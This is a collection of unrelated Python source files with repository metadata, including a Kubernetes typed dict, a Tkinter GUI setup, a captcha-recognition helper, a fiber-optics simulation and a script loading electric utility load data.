] | 4 | 2021-03-08T07:06:12.000Z | 2022-03-29T23:41:45.000Z | kubernetes_typed/client/models/v1_subject_access_review_status.py | nikhiljha/kubernetes-typed | 4f4b969aa400c88306f92560e56bda6d19b2a895 | [
"Apache-2.0"
] | 2 | 2021-09-05T19:18:28.000Z | 2022-03-14T02:56:17.000Z | # Code generated by `typeddictgen`. DO NOT EDIT.
"""V1SubjectAccessReviewStatusDict generated type."""
from typing import TypedDict
V1SubjectAccessReviewStatusDict = TypedDict(
"V1SubjectAccessReviewStatusDict",
{
"allowed": bool,
"denied": bool,
"evaluationError": str,
"reason": str,
},
total=False,
)
| 23.533333 | 53 | 0.66289 | # Code generated by `typeddictgen`. DO NOT EDIT.
"""V1SubjectAccessReviewStatusDict generated type."""
from typing import TypedDict
V1SubjectAccessReviewStatusDict = TypedDict(
"V1SubjectAccessReviewStatusDict",
{
"allowed": bool,
"denied": bool,
"evaluationError": str,
"reason": str,
},
total=False,
)
| 0 | 0 | 0 |
b544a2e462706d7df03ff44b7026a01ff5eb4a79 | 793 | py | Python | frontend/GUI/ROOT_AND_MAIN/setup.py | Lucianofc138/smart_scheduler_usm | 0ac50d71cfd1947b889a9551c31a3a67ecabfb88 | [
"MIT"
] | null | null | null | frontend/GUI/ROOT_AND_MAIN/setup.py | Lucianofc138/smart_scheduler_usm | 0ac50d71cfd1947b889a9551c31a3a67ecabfb88 | [
"MIT"
] | null | null | null | frontend/GUI/ROOT_AND_MAIN/setup.py | Lucianofc138/smart_scheduler_usm | 0ac50d71cfd1947b889a9551c31a3a67ecabfb88 | [
"MIT"
] | null | null | null | from ROOT_AND_MAIN.widgets import Root_and_main
import ROOT_AND_MAIN.USER_WINDOW.setup as user_window
import ROOT_AND_MAIN.SCHEDULE_WINDOW.setup as schedule_window
import ROOT_AND_MAIN.SUBJECT_WINDOW.setup as subject_window | 41.736842 | 74 | 0.828499 | from ROOT_AND_MAIN.widgets import Root_and_main
import ROOT_AND_MAIN.USER_WINDOW.setup as user_window
import ROOT_AND_MAIN.SCHEDULE_WINDOW.setup as schedule_window
import ROOT_AND_MAIN.SUBJECT_WINDOW.setup as subject_window
def setup():
root_and_main_container = Root_and_main()
window1 = user_window.setup(root_and_main_container.window_manager)
window2 = subject_window.setup(root_and_main_container.window_manager)
window3 = subject_window.setup(root_and_main_container.window_manager)
root_and_main_container.window_manager.add(window1, text="Usuario")
root_and_main_container.window_manager.add(window2, text="Ramos")
root_and_main_container.window_manager.add(window3, text="Horarios")
root_and_main_container.grid()
root_and_main_container.run() | 546 | 0 | 23 |
03499f5a2ea02a4b486f32f1e63da88f63254da4 | 195 | py | Python | opinionated_reporting/apps.py | jobelenus/opinionated-reporting | 7b41f479e7aa8d9bd9a374f0799df92d430b7a6f | [
"MIT"
] | null | null | null | opinionated_reporting/apps.py | jobelenus/opinionated-reporting | 7b41f479e7aa8d9bd9a374f0799df92d430b7a6f | [
"MIT"
] | null | null | null | opinionated_reporting/apps.py | jobelenus/opinionated-reporting | 7b41f479e7aa8d9bd9a374f0799df92d430b7a6f | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 24.375 | 44 | 0.779487 | from django.apps import AppConfig
class OpinionatedReportingConfig(AppConfig):
name = 'opinionated_reporting'
verbose_name = "Opinionated Reporting"
label = 'opinionated_reporting'
| 0 | 137 | 23 |
387e5fec290d4d08ed77489ba1f209a4ea4dd5b0 | 3,411 | py | Python | cap_extra/recognise.py | Apkawa/simple-captcha-ocr-opencv | b0c20c8cac75feac1d10b21b99629ac5d66cd744 | [
"MIT"
] | 1 | 2015-12-29T09:52:58.000Z | 2015-12-29T09:52:58.000Z | cap_extra/recognise.py | Apkawa/simple-captcha-ocr-opencv | b0c20c8cac75feac1d10b21b99629ac5d66cd744 | [
"MIT"
] | null | null | null | cap_extra/recognise.py | Apkawa/simple-captcha-ocr-opencv | b0c20c8cac75feac1d10b21b99629ac5d66cd744 | [
"MIT"
] | null | null | null | """
Copyright 2011 Dmitry Nikulin
This file is part of Captchure.
Captchure is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Captchure is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Captchure. If not, see <http://www.gnu.org/licenses/>.
"""
import cv
from pyfann import libfann
from cvext import copyTo
from general import argmax
| 33.441176 | 85 | 0.625916 | """
Copyright 2011 Dmitry Nikulin
This file is part of Captchure.
Captchure is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Captchure is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Captchure. If not, see <http://www.gnu.org/licenses/>.
"""
import cv
from pyfann import libfann
from cvext import copyTo
from general import argmax
def loadAnn(ann_file):
ann = libfann.neural_net()
ann.create_from_file(ann_file)
return ann
def flattenImage(image):
lst = []
for y in range(image.height):
for x in range(image.width):
n = image[y, x] / 127.5 - 1.0
lst.append(n)
return lst
def resizeNaive(image, size):
result = cv.CreateImage(size, cv.IPL_DEPTH_8U, 1)
cv.Resize(image, result, cv.CV_INTER_CUBIC)
return result
def resizeProp(image, (segW, segH)):
result = cv.CreateImage((segW, segH), image.depth, image.nChannels)
cv.Zero(result)
if image.width <= segW and image.height <= segH:
offW = (segW - image.width) / 2
offH = (segH - image.height) / 2
copyTo(image, result, (offW, offH), None)
else:
scaleW = float(segW) / float(image.width)
newH = image.height * scaleW
if newH <= segH:
offH = (segH - newH) / 2.0
rect = (0, int(offH), segW, int(newH))
else:
scaleH = float(segH) / float(image.height)
newW = image.width * scaleH
offW = (segW - newW) / 2.0
rect = (int(offW), 0, int(newW), segH)
cv.SetImageROI(result, rect)
cv.Resize(image, result, cv.CV_INTER_CUBIC)
cv.ResetImageROI(result)
return result
def resizeFit(image, (segW, segH)):
result = cv.CreateImage((segW, segH), image.depth, image.nChannels)
cv.Zero(result)
if image.width > segW:
if image.height > segH:
cv.Resize(image, result, cv.CV_INTER_CUBIC)
else:
temp = cv.CreateImage((segW, image.height), image.depth, image.nChannels)
cv.Resize(image, temp, cv.CV_INTER_CUBIC)
offH = (segH - image.height) / 2
copyTo(temp, result, (0, offH), None)
else:
if image.height > segH:
temp = cv.CreateImage((image.width, segH), image.depth, image.nChannels)
cv.Resize(image, temp, cv.CV_INTER_CUBIC)
offW = (segW - image.width) / 2
copyTo(temp, result, (offW, 0), None)
else:
offW = (segW - image.width) / 2
offH = (segH - image.height) / 2
copyTo(image, result, (offW, offH), None)
return result
def recogniseChar(image, ann, charset):
result = ann.run(flattenImage(image))
return charset[argmax(result)]
def defaultRecognise(segments, addr, extras, ann, size, charset, resizer):
segments = map(lambda seg: resizer(seg, size), segments)
return "".join(map(lambda seg: recogniseChar(seg, ann, charset), segments)) | 2,431 | 0 | 161 |
2786aa1d3ee81948426359f764eacbd85e2371ee | 128 | py | Python | src/main.py | pffijt/canopen-project | 08922a7e2ee7ee3f76b0a15e14df40e338c597da | [
"MIT"
] | null | null | null | src/main.py | pffijt/canopen-project | 08922a7e2ee7ee3f76b0a15e14df40e338c597da | [
"MIT"
] | null | null | null | src/main.py | pffijt/canopen-project | 08922a7e2ee7ee3f76b0a15e14df40e338c597da | [
"MIT"
] | null | null | null | import canopen
network = canopen.Network()
network.connect(channel='can0', bustype='socketcan')
node = network.add_node(6, '') | 21.333333 | 52 | 0.742188 | import canopen
network = canopen.Network()
network.connect(channel='can0', bustype='socketcan')
node = network.add_node(6, '') | 0 | 0 | 0 |
494781a2b687058b1ee71c63ce31988e72495630 | 1,950 | py | Python | tests/direct_modulation.py | curio-sitas/fiber-nlse | 41cda9a85705a5a0a29db1c7ab0cbcd4cca35674 | [
"MIT"
] | null | null | null | tests/direct_modulation.py | curio-sitas/fiber-nlse | 41cda9a85705a5a0a29db1c7ab0cbcd4cca35674 | [
"MIT"
] | null | null | null | tests/direct_modulation.py | curio-sitas/fiber-nlse | 41cda9a85705a5a0a29db1c7ab0cbcd4cca35674 | [
"MIT"
] | null | null | null | #%%
import numpy as np
import sys
import pylab as plt
sys.path.append('../')
from fiber_nlse.fiber_nlse import *
# Physical units & constants
nm = 1e-9
ps = 1e-12
km = 1e3
mW = 1e-3
GHz = 1e9
Thz = 1e12
m = 1
W = 1
c = 3e8
# Simulation metrics
N_t = 2000
N_z = 1000
# Physical parameters
# Source
T = 500*ps
λ = 1550 * nm
P0 = 490 * mW
f0 = 10 * GHz
# Fiber
α = 0.046 / km
γ = 10.1 / W / km
γ2 = 1.1 / W / km
L2 = 5000 * m
L = 0 * m
D = -0.8 * ps / nm /km
D2 = - 20 * ps / nm / km
β2 = - D*λ**2/(2*np.pi*c) # dispersion
β2_2 = - D2*λ**2/(2*np.pi*c) # dispersion
τ0 = 10*ps # pulse FWHM
fib = Fiber(L, α, β2, γ) # create fiber
sim = SegmentSimulation(fib, N_z, N_t, direct_modulation, T) # simulate on the fiber portion
t, U = sim.run() # perform simulation
Pmatrix = np.abs(U)**2
fib2 = Fiber(L2, α, β2_2, γ2)
sim2 = SegmentSimulation(fib2, N_z, N_t, lambda x : U[-1,:], T) # simulate on the fiber portion
t, U2 = sim2.run() # perform simulation
Pmatrix = np.abs(np.vstack((U, U2)))**2/mW # compute optical power matrix
#%%
plt.figure()
plt.title(r'Pulse progagation with dipsersion')
plt.imshow(Pmatrix, aspect='auto', extent=[-T/2/ps, T/2/ps, L/km, 0])
plt.tight_layout()
plt.xlabel(r'Local time [ns]')
plt.ylabel(r'Distance [km]')
cb = plt.colorbar()
cb.set_label(r'Optical power [mW]')
plt.show()
# %%
plt.figure()
plt.title(r'Pulse propagation with dispersion')
plt.plot(t/ps,np.unwrap(np.angle(np.fft.fftshift(np.fft.fft(U[0,:])))), label=r'Pulse at z={:.2f} km'.format(0))
plt.plot(t/ps,np.unwrap(np.angle(np.fft.fftshift(np.fft.fft(U[-1,:])))), label=r'Pulse at z={:.2f} km'.format(L/km))
plt.grid()
plt.legend()
plt.ylabel(r'Optical phase [rad]')
plt.xlabel(r'Local time [ns]')
plt.tight_layout()
plt.show()
# %%
plt.plot(Pmatrix[-1,:])
plt.plot(Pmatrix[0,:])
plt.show()
# %%
| 20.744681 | 116 | 0.637949 | #%%
import numpy as np
import sys
import pylab as plt
sys.path.append('../')
from fiber_nlse.fiber_nlse import *
# Physical units & constants
nm = 1e-9
ps = 1e-12
km = 1e3
mW = 1e-3
GHz = 1e9
Thz = 1e12
m = 1
W = 1
c = 3e8
# Simulation metrics
N_t = 2000
N_z = 1000
# Physical parameters
# Source
T = 500*ps
λ = 1550 * nm
P0 = 490 * mW
f0 = 10 * GHz
# Fiber
α = 0.046 / km
γ = 10.1 / W / km
γ2 = 1.1 / W / km
L2 = 5000 * m
L = 0 * m
D = -0.8 * ps / nm /km
D2 = - 20 * ps / nm / km
β2 = - D*λ**2/(2*np.pi*c) # dispersion
β2_2 = - D2*λ**2/(2*np.pi*c) # dispersion
τ0 = 10*ps # pulse FWHM
def gaussian_pulse(t):
return np.sqrt(P0)*np.exp(-((t-T/2)/(2*τ0))**2)
def direct_modulation(t):
return np.sqrt(P0)*np.cos(2*np.pi*f0*t)
fib = Fiber(L, α, β2, γ) # create fiber
sim = SegmentSimulation(fib, N_z, N_t, direct_modulation, T) # simulate on the fiber portion
t, U = sim.run() # perform simulation
Pmatrix = np.abs(U)**2
fib2 = Fiber(L2, α, β2_2, γ2)
sim2 = SegmentSimulation(fib2, N_z, N_t, lambda x : U[-1,:], T) # simulate on the fiber portion
t, U2 = sim2.run() # perform simulation
Pmatrix = np.abs(np.vstack((U, U2)))**2/mW # compute optical power matrix
#%%
plt.figure()
plt.title(r'Pulse progagation with dipsersion')
plt.imshow(Pmatrix, aspect='auto', extent=[-T/2/ps, T/2/ps, L/km, 0])
plt.tight_layout()
plt.xlabel(r'Local time [ns]')
plt.ylabel(r'Distance [km]')
cb = plt.colorbar()
cb.set_label(r'Optical power [mW]')
plt.show()
# %%
plt.figure()
plt.title(r'Pulse propagation with dispersion')
plt.plot(t/ps,np.unwrap(np.angle(np.fft.fftshift(np.fft.fft(U[0,:])))), label=r'Pulse at z={:.2f} km'.format(0))
plt.plot(t/ps,np.unwrap(np.angle(np.fft.fftshift(np.fft.fft(U[-1,:])))), label=r'Pulse at z={:.2f} km'.format(L/km))
plt.grid()
plt.legend()
plt.ylabel(r'Optical phase [rad]')
plt.xlabel(r'Local time [ns]')
plt.tight_layout()
plt.show()
# %%
plt.plot(Pmatrix[-1,:])
plt.plot(Pmatrix[0,:])
plt.show()
# %%
| 102 | 0 | 46 |
0c92987e9c275e624130aae8842a6cf51f12a3ef | 1,022 | py | Python | ProgramFlow/dictandsets/atrocias_hash.py | kumarvgit/python3 | 318c5e7503fafc9c60082fa123e2930bd82a4ec9 | [
"MIT"
] | null | null | null | ProgramFlow/dictandsets/atrocias_hash.py | kumarvgit/python3 | 318c5e7503fafc9c60082fa123e2930bd82a4ec9 | [
"MIT"
] | null | null | null | ProgramFlow/dictandsets/atrocias_hash.py | kumarvgit/python3 | 318c5e7503fafc9c60082fa123e2930bd82a4ec9 | [
"MIT"
] | null | null | null | data = [
("orange", "a sweet, orange, citrus fruit"),
("apple", "good for making cider"),
("lemon", "a sour, yellow citrus fruit"),
("grape", "a small, sweet fruit growing in bunches"),
("melon", "sweet and juicy"),
]
# Convert to ASCII chars
# print(ord("a"))
# print(ord("b"))
# print(ord("z"))
def simple_hash(s: str) -> int:
"""A ridiculously simple hashing function"""
basic_hash = ord(s[0])
return basic_hash % 10
def get(k: str) -> int:
"""
return value of the kry
:param k: the key
:return: `int if found else None`
"""
hash_code = simple_hash(k)
if values[hash_code]:
return values[hash_code]
else:
return None
for key, value in data:
h = simple_hash(key)
# h = hash(key)
print(key, h)
keys = [""] * 10
values = keys.copy()
for key, value in data:
h = simple_hash(key)
print(key, h)
# add in hash keys
keys[h] = key
values[h] = value
print(keys)
print(values)
print()
print(get('lemon'))
| 18.25 | 57 | 0.581213 | data = [
("orange", "a sweet, orange, citrus fruit"),
("apple", "good for making cider"),
("lemon", "a sour, yellow citrus fruit"),
("grape", "a small, sweet fruit growing in bunches"),
("melon", "sweet and juicy"),
]
# Convert to ASCII chars
# print(ord("a"))
# print(ord("b"))
# print(ord("z"))
def simple_hash(s: str) -> int:
"""A ridiculously simple hashing function"""
basic_hash = ord(s[0])
return basic_hash % 10
def get(k: str) -> int:
"""
return value of the kry
:param k: the key
:return: `int if found else None`
"""
hash_code = simple_hash(k)
if values[hash_code]:
return values[hash_code]
else:
return None
for key, value in data:
h = simple_hash(key)
# h = hash(key)
print(key, h)
keys = [""] * 10
values = keys.copy()
for key, value in data:
h = simple_hash(key)
print(key, h)
# add in hash keys
keys[h] = key
values[h] = value
print(keys)
print(values)
print()
print(get('lemon'))
| 0 | 0 | 0 |
8878ea06ed16bfc83674cc952a9a3d0d1d2ecfa0 | 198,392 | py | Python | temporary/ferc_util_prep.py | mdbartos/RIPS | ab654138ccdcd8cb7c4ab53092132e0156812e95 | [
"MIT"
] | 1 | 2021-04-02T03:05:55.000Z | 2021-04-02T03:05:55.000Z | temporary/ferc_util_prep.py | mdbartos/RIPS | ab654138ccdcd8cb7c4ab53092132e0156812e95 | [
"MIT"
] | 2 | 2015-05-13T23:35:43.000Z | 2015-05-22T00:51:23.000Z | temporary/ferc_util_prep.py | mdbartos/RIPS | ab654138ccdcd8cb7c4ab53092132e0156812e95 | [
"MIT"
] | 2 | 2015-05-13T23:29:03.000Z | 2015-05-21T22:50:15.000Z | import numpy as np
import pandas as pd
import os
import datetime
homedir = os.path.expanduser('~')
datadir = 'github/RIPS_kircheis/data/eia_form_714/processed/'
fulldir = homedir + '/' + datadir
# li = []
# for d1 in os.listdir('.'):
# for fn in os.listdir('./%s' % d1):
# li.append(fn)
# dir_u = pd.Series(li).str[:-2].order().unique()
###### NPCC
# BECO: 54913 <- 1998
# BHE: 1179
# CELC: 1523 <- 2886
# CHGE: 3249
# CMP: 3266
# COED: 4226
# COEL: 4089 -> IGNORE
# CVPS: 3292
# EUA: 5618
# GMP: 7601
# ISONY: 13501
# LILC: 11171 <- 11172
# MMWE: 11806
# NEES: 13433
# NEPOOL: 13435
# NMPC: 13573
# NU: 13556
# NYPA: 15296
# NYPP: 13501
# NYS: 13511
# OR: 14154
# RGE: 16183
# UI: 19497
npcc = {
54913 : {
1993 : pd.read_fwf('%s/npcc/1993/BECO93' % (fulldir), header=None, skipfooter=1).loc[:, 2:].values.ravel(),
1994 : pd.read_csv('%s/npcc/1994/BECO94' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[4].values,
1995 : pd.read_csv('%s/npcc/1995/BECO95' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
1996 : pd.read_csv('%s/npcc/1996/BECO96' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
1997 : pd.read_csv('%s/npcc/1997/BECO97' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[4].values,
1998 : pd.read_csv('%s/npcc/1998/BECO98' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
1999 : pd.read_csv('%s/npcc/1999/BECO99' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2000 : pd.read_csv('%s/npcc/2000/BECO00' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2001 : pd.read_csv('%s/npcc/2001/BECO01' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2002 : pd.read_csv('%s/npcc/2002/BECO02' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2003 : pd.read_csv('%s/npcc/2003/BECO03' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2004 : pd.read_csv('%s/npcc/2004/BECO04' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values
},
1179 : {
1993 : pd.read_csv('%s/npcc/1993/BHE93' % (fulldir), sep=' ', skiprows=2, skipinitialspace=True).loc[:, '0000':].values.ravel(),
1994 : pd.read_csv('%s/npcc/1994/BHE94' % (fulldir)).dropna(how='all').loc[:729, '1/13':'12/24'].values.ravel(),
1995 : (pd.read_fwf('%s/npcc/1995/BHE95' % (fulldir)).loc[:729, '1/13':'1224'].astype(float)/10).values.ravel(),
2001 : pd.read_excel('%s/npcc/2001/BHE01' % (fulldir), skiprows=2).iloc[:, 1:24].values.ravel(),
2003 : pd.read_excel('%s/npcc/2003/BHE03' % (fulldir), skiprows=3).iloc[:, 1:24].values.ravel()
},
1523 : {
1999 : pd.read_csv('%s/npcc/1999/CELC99' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2000 : pd.read_csv('%s/npcc/2000/CELC00' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2001 : pd.read_csv('%s/npcc/2001/CELC01' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2002 : pd.read_csv('%s/npcc/2002/CELC02' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2003 : pd.read_csv('%s/npcc/2003/CELC03' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2004 : pd.read_csv('%s/npcc/2004/CELC04' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values
},
3249 : {
1993 : pd.read_csv('%s/npcc/1993/CHGE93' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[2].values,
1994 : pd.read_fwf('%s/npcc/1994/CHGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(float).values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/CHGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/CHGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(float).values.ravel(),
1997 : pd.read_csv('%s/npcc/1997/CHGE97' % (fulldir), sep ='\s', skipinitialspace=True, header=None, skipfooter=1).iloc[:, 4:].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/CHGE98' % (fulldir), skipfooter=1, header=None).iloc[:, 2:].values.ravel(),
},
3266 : {
1993 : pd.read_fwf('%s/npcc/1993/CMP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/CMP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/CMP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/CMP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/CMP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/CMP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/npcc/2002/CMP02' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
2003 : pd.read_fwf('%s/npcc/2003/CMP03' % (fulldir), header=None).iloc[:, 1:].values.ravel()
},
4226 : {
1993 : pd.read_csv('%s/npcc/1993/COED93' % (fulldir), skipfooter=1, skiprows=11, header=None, skipinitialspace=True, sep=' ')[2].values,
1994 : pd.read_fwf('%s/npcc/1994/COED94' % (fulldir), skipfooter=1, header=None)[1].values,
1995 : pd.read_csv('%s/npcc/1995/COED95' % (fulldir), skiprows=3, header=None),
1996 : pd.read_excel('%s/npcc/1996/COED96' % (fulldir)).iloc[:, -1].values.ravel(),
1997 : pd.read_excel('%s/npcc/1997/COED97' % (fulldir), skiprows=1).iloc[:, -1].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/COED98' % (fulldir), skiprows=1).iloc[:, -1].values.ravel(),
1999 : pd.read_csv('%s/npcc/1999/COED99' % (fulldir), skiprows=1, sep='\t').iloc[:, -1].str.replace(',', '').astype(int).values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/COED00' % (fulldir), sep='\t')[' Load '].dropna().str.replace(',', '').astype(int).values.ravel(),
2001 : pd.read_csv('%s/npcc/2001/COED01' % (fulldir), sep='\t', skipfooter=1)['Load'].dropna().str.replace(',', '').astype(int).values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/COED02' % (fulldir), sep='\t', skipfooter=1, skiprows=1)['Load'].dropna().str.replace(',', '').astype(int).values.ravel(),
2003 : pd.read_csv('%s/npcc/2003/COED03' % (fulldir), sep='\t')['Load'].dropna().astype(int).values.ravel(),
2004 : pd.read_csv('%s/npcc/2004/COED04' % (fulldir), header=None).iloc[:, -1].str.replace('[A-Z,]', '').str.replace('\s', '0').astype(int).values.ravel()
},
4089 : {
1993 : pd.read_fwf('%s/npcc/1993/COEL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/COEL95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/COEL96' % (fulldir), sep=' ', skipinitialspace=True, header=None)[3].values,
1997 : pd.read_csv('%s/npcc/1997/COEL97' % (fulldir), sep=' ', skipinitialspace=True, header=None)[4].values,
1998 : pd.read_csv('%s/npcc/1998/COEL98' % (fulldir), sep=' ', skipinitialspace=True, header=None)[4].values,
1999 : pd.read_csv('%s/npcc/1999/COEL99' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2000 : pd.read_csv('%s/npcc/2000/COEL00' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2001 : pd.read_csv('%s/npcc/2001/COEL01' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2002 : pd.read_csv('%s/npcc/2002/COEL02' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2003 : pd.read_csv('%s/npcc/2003/COEL03' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2004 : pd.read_csv('%s/npcc/2004/COEL04' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values
},
3292 : {
1995 : pd.read_fwf('%s/npcc/1995/CVPS95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/CVPS96' % (fulldir), header=None, skipfooter=1)[1].values,
1997 : pd.read_csv('%s/npcc/1997/CVPS97' % (fulldir), header=None)[2].values,
1998 : pd.read_csv('%s/npcc/1998/CVPS98' % (fulldir), header=None, skipfooter=1)[4].values,
1999 : pd.read_csv('%s/npcc/1999/CVPS99' % (fulldir))['Load'].values
},
5618 : {
1993 : pd.read_fwf('%s/npcc/1993/EUA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/EUA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/EUA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/EUA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/EUA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/EUA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
7601 : {
1993 : pd.read_csv('%s/npcc/1993/GMP93' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=4)[0].replace('MWH', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/GMP94' % (fulldir), header=None)[0].values,
1995 : pd.read_csv('%s/npcc/1995/GMP95' % (fulldir), sep=' ', skipinitialspace=True, header=None)[0].values,
1996 : pd.read_csv('%s/npcc/1996/GMP96' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].values,
1997 : pd.read_csv('%s/npcc/1997/GMP97' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].values,
1998 : pd.read_csv('%s/npcc/1998/GMP98' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].astype(str).str[:3].astype(float).values,
1999 : pd.read_csv('%s/npcc/1999/GMP99' % (fulldir), sep=' ', skipinitialspace=True, header=None, skipfooter=1).iloc[:8760, 0].values,
2002 : pd.read_excel('%s/npcc/2002/GMP02' % (fulldir), skiprows=6, skipfooter=1).iloc[:, 0].values,
2003 : pd.read_excel('%s/npcc/2003/GMP03' % (fulldir), skiprows=6, skipfooter=1).iloc[:, 0].values,
2004 : pd.read_csv('%s/npcc/2004/GMP04' % (fulldir), skiprows=13, sep='\s').iloc[:, 0].values
},
13501 : {
2002 : pd.read_csv('%s/npcc/2002/ISONY02' % (fulldir), sep='\t')['mw'].values,
2003 : pd.read_excel('%s/npcc/2003/ISONY03' % (fulldir))['Load'].values,
2004 : pd.read_excel('%s/npcc/2004/ISONY04' % (fulldir)).loc[:, 'HR1':].values.ravel()
},
11171 : {
1994 : pd.read_fwf('%s/npcc/1994/LILC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/LILC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/LILC97' % (fulldir), skiprows=4, widths=[8,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
},
11806 : {
1998 : pd.read_fwf('%s/npcc/1998/MMWE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/MMWE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2000 : pd.read_fwf('%s/npcc/2000/MMWE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
